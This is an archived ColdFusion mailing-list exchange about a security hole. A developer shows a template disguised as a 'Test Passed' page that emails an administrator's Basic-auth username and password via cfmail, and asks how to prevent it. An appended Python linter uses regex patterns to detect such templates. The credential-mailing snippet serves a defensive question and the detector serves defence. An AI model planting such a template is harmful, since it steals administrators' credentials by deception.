If you can't trust your developers then you need new people. We trust every
faceless programmer who works on any software that we load on our
workstations and servers. We trust consultants not to create backdoors when
brought in, and, in developer shoes, we trust the Admins not to misuse their
power. So, in short, you have to maintain a certain amount of trust, that's
how the world works.

Steve


----- Original Message -----
From: "Jamie Jackson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, November 03, 2000 11:21 AM
Subject: Security hole in basic authorization... Solutions?

Say I'm a developer, but not a SysAdmin.

It is too easy for me to get an administrator's username/password like
this, using Win2k basic authorization:

Hey, administrator, I'm troubleshooting a template, would you see if
the test passes?:

<html><body>
Test Passed! Thanks, for checking, administrator!
<cfmail to="[EMAIL PROTECTED]" from="[EMAIL PROTECTED]" subject="Got Root!">
#cgi.auth_user#
#cgi.auth_password#
</cfmail>
</body></html>

How do I prevent this from working?

Thanks,
Jamie
------------------------------------------------------------------------------------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=sts or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
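A defender-side check in the spirit of Jamie's question, added here and not part of the original thread: a small Python linter that flags ColdFusion templates reading CGI.AUTH_PASSWORD (the variable the posted template mails out) and rates the finding higher when the same template also contains a tag that can move data off the server. The sample templates, file names and the tag list are constructed for this example.

```python
import re

# Constructed sample templates (not from the original post): the first mirrors the
# pattern described in the thread, the second only greets the authenticated user.
SAMPLE_TEMPLATES = {
    "troubleshoot.cfm": (
        "<html><body>\n"
        "Test Passed!\n"
        '<cfmail to="ops@example.invalid" from="app@example.invalid" subject="test">\n'
        "#cgi.auth_user#\n"
        "#CGI.AUTH_PASSWORD#\n"
        "</cfmail>\n"
        "</body></html>\n"
    ),
    "hello.cfm": "<cfoutput>Welcome, #CGI.AUTH_USER#</cfoutput>\n",
}

# Matches cgi.auth_password, CGI["AUTH_PASSWORD"] and cgi['auth_password'], any case.
CREDENTIAL_VAR = re.compile(
    r"""\bcgi\s*(?:\.\s*auth_password\b|\[\s*['"]auth_password['"]\s*\])""",
    re.IGNORECASE,
)
# Tags that can send or write data out of the request; their presence raises severity.
EXFIL_TAG = re.compile(r"<cf(?:mail|http|file|ftp|log)\b", re.IGNORECASE)


def scan_template(name, source):
    """Return one finding per line that reads the Basic-auth password."""
    exfil = bool(EXFIL_TAG.search(source))
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if CREDENTIAL_VAR.search(line):
            findings.append({
                "file": name,
                "line": lineno,
                "severity": "high" if exfil else "medium",
                "text": line.strip(),
            })
    return findings


def scan_all(templates):
    """Scan a {filename: source} mapping and collect all findings."""
    results = []
    for name, source in templates.items():
        results.extend(scan_template(name, source))
    return results


if __name__ == "__main__":
    for f in scan_all(SAMPLE_TEMPLATES):
        print(f"{f['file']}:{f['line']} [{f['severity']}] {f['text']}")
```

Reading the user name alone is not flagged, since templates legitimately greet the authenticated user; the password variable is what has no business in application code.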
